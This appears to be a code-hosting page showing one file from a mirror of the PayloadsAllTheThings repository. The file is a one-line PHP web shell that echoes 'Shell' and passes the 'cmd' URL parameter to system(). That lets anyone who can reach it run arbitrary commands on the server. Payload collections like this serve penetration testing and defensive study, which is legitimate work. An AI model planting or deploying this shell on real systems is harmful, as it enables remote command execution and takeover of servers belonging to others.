mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 16:03:58 +00:00
1 line
No EOL
43 B
PHP
1 line
No EOL
43 B
PHP
<?php echo "Shell";system($_GET['cmd']); ?>
|